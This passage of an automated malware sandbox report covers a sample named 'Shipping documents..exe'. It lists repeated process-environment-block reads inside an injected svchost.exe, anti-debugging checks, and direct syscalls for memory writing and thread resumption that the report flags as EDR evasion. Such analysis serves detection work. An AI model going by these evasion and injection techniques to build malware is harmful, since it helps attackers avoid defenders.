                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
